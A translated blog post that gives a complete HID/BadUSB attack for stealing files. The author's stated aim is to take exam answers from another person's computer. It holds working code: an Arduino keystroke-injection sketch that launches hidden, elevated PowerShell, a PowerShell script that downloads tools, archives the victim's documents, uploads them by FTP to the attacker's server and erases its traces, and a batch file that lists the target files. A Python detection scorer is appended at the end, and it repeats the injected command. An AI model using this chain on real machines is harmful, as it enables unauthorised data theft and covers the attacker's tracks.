HID Advanced Attack posture: How to Use PowerShell scripts to steal files

Source: Internet
Author: User


0x01 Introduction

After the mid-term exam I had to get hold of the answers again. I found that remotely downloading and running an exe does not work well and easily triggers antivirus alerts, so this time I plan to use a PowerShell script.

0x02 About HID

HID is short for Human Interface Device. As the name suggests, a HID device is one that interacts directly with a person, such as a keyboard, mouse, or game controller. A human interface is not strictly required, however: any device that complies with the HID class specification is a HID device. Attacks against HID generally concentrate on the keyboard and mouse, because once the user's keyboard is controlled, the user's computer is basically controlled. Attackers can hide the attack inside an ordinary-looking mouse or keyboard; when the user plugs a mouse or keyboard carrying the attack vector into a computer, the malicious code is loaded and executed.

0x03 Preparation tools

An Internet-facing host (a computer connected to a network cable with broadband dial-up is enough)

A HID attack tool (roast goose or another BadUSB device)

FTP server (set up an FTP server to receive the stolen files)

PHPstudy (set up an HTTP server to host the PowerShell script and the other files)

7z.exe / 7z.dll (hosted on the HTTP server; the files are compressed before upload to keep the upload as small and fast as possible)

0x04 Code section (the following code may be offensive and should not be used for illegal purposes)

1. [get.bat] (lists the paths of the wanted files and saves them to c:\temp.bat) [this file is stored in the HTTP root directory of the server]

dir /s /a /b "%userprofile%\desktop\*.txt">c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.doc">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.docx">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.xls">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.xlsx">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.ppt">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.xls">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.eet">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.et">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.xlt">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.pdf">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.jpg">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.jpeg">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.png">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.bmp">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.gif">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.rtf">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.htl">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.txt">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.doc">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.docx">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xls">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xlsx">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.ppt">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xls">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.eet">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.et">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xlt">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.pdf">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.jpg">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.jpeg">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.png">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.bmp">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.gif">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.rtf">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.htl">>c:\temp.bat

2. [get.ps1] (clears the Run history, downloads 7z.dll / 7z.exe / get.bat from the server to their locations on drive C, runs get.bat, 7z-compresses every file listed in c:\temp.bat into c:\Ram.7z, uploads c:\Ram.7z to the FTP server root directory, and deletes all downloaded files !!! A total of four IP addresses need to be changed !!!) [This file is stored in the HTTP root directory of the server. Remember to set the FTP server password to admin.]

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f;
(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.dll','c:\7z.dll');
(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.exe','c:\7z.exe');
(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/get.bat','c:\Users\Public\get.bat');
C:\Users\Public\get.bat;$array="";foreach($u in(get-content c:\temp.bat)){[array]$array +='c:\7z a -t7z c:\Ram.7z "'+$u+'"'};$array | Out-File -Encoding default c:\temp.bat;c:\temp.bat;
$fileinf=New-Object System.Io.FileInfo("C:\Ram.7z");
$ftp = [System.Net.FtpWebRequest] [System.Net.FtpWebRequest]::Create("ftp://192.168.1.1/"+$fileinf.name)
$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
$ftp.Credentials = new-object System.Net.NetworkCredential("admin","admin")
$ftp.UseBinary = $true
$ftp.UsePassive = $true
$content = [System.IO.File]::ReadAllBytes($fileInf.fullname)
$ftp.ContentLength = $content.Length
$rs = $ftp.GetRequestStream()
$rs.Write($content, 0, $content.Length)
$rs.Close()
$rs.Dispose()
Remove-Item c:\temp.bat
Remove-Item c:\Ram.*
Remove-Item c:\7z.*
Remove-Item c:\Users\Public\get.*

3. [get.ino] (downloads get.ps1 as administrator into the local c:\users\public directory and runs it !!! One IP address needs to be changed !!! Once the UAC prompt has flashed past, remember to unplug the device.) [flash it to the board directly after modifying the IP address]

void setup() { // initialization
  Keyboard.begin(); // start keyboard communication
  delay(5000); // wait
  Keyboard.press(KEY_LEFT_GUI); // Win key
  delay(500);
  Keyboard.press('R'); // r key
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.println("POWERSHELL -NOP");
  delay(800);
  Keyboard.println();
  delay(800);
  Keyboard.println("START-PROCESS -fILEpATH POWERSHELL \" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE(\'HTTP://192.168.1.1/GET.PS1\',\'C:\\USERS\\PUBLIC\\GET.PS1\');./GET.PS1;EXIT\" -vERB RUNAS;EXIT");
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end(); // end keyboard communication
}

void loop() // loop
{
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.print('y');
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.release(KEY_LEFT_ALT);
  delay(50);
}
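From the defender's side, the chain above leaves a recognisable combination of indicators in process-creation and PowerShell logs. The following Python scorer is an added example, not code from the page: it scores command lines (for instance Sysmon Event 1 or Windows 4688 exports) against the indicators the get.ino and get.ps1 above produce. The sample command lines are constructed here, and matching is case-insensitive because the Caps Lock trick can deliver the typed command in either case.

```python
"""Score process command lines for the HID-to-PowerShell exfiltration chain.

Added detection example (constructed samples, not real telemetry). The
Caps Lock trick in get.ino means the injected text can reach the host with
inverted case if the lock state was not what the payload expected, so every
pattern is compiled with re.IGNORECASE.
"""
import re

# (indicator name, regex) pairs drawn from the page's own get.ino / get.ps1
INDICATORS = [
    ("hidden_window",   r"-w(?:indowstyle)?\s+hidden"),
    ("no_profile",      r"-nop\b"),
    ("exec_policy",     r"set-executionpolicy\s+\S+\s+-force"),
    ("runas_elevation", r"-verb\s+runas"),
    ("webclient_dl",    r"net\.webclient\)\.downloadfile\("),
    ("public_dir_exec", r"\\users\\public\\\S+\.(?:ps1|bat)"),
    ("runmru_wipe",     r"reg\s+delete\s+\S*\\runmru"),
    ("ftp_upload",      r"ftpwebrequest|webrequestmethods\+ftp"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in INDICATORS]


def match_indicators(cmdline: str) -> list[str]:
    """Return the names of every indicator present in one command line."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]


def is_suspicious(cmdline: str, threshold: int = 3) -> bool:
    """Flag only when several indicators co-occur; a lone -nop is common in admin scripts."""
    return len(match_indicators(cmdline)) >= threshold


# Constructed sample command lines.
SAMPLES = [
    # The injected Start-Process line exactly as typed (inverted case, Caps Lock off)
    "START-PROCESS -fILEpATH POWERSHELL \" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED "
    "-FORCE;CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE('HTTP://192.168.1.1/GET.PS1',"
    "'C:\\USERS\\PUBLIC\\GET.PS1');./GET.PS1;EXIT\" -vERB RUNAS;EXIT",
    # Benign administrative use of -NoP
    "powershell.exe -NoP -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    # First lines of get.ps1 as they would appear in a script-block log
    "reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f;"
    "(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.exe','c:\\7z.exe');"
    "$ftp=[System.Net.FtpWebRequest]::Create('ftp://192.168.1.1/Ram.7z')",
]


def scan(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (index, matched indicators) for every line that crosses the threshold."""
    return [(i, match_indicators(l)) for i, l in enumerate(lines) if is_suspicious(l)]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLES):
        print(f"sample {idx}: {', '.join(hits)}")
```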
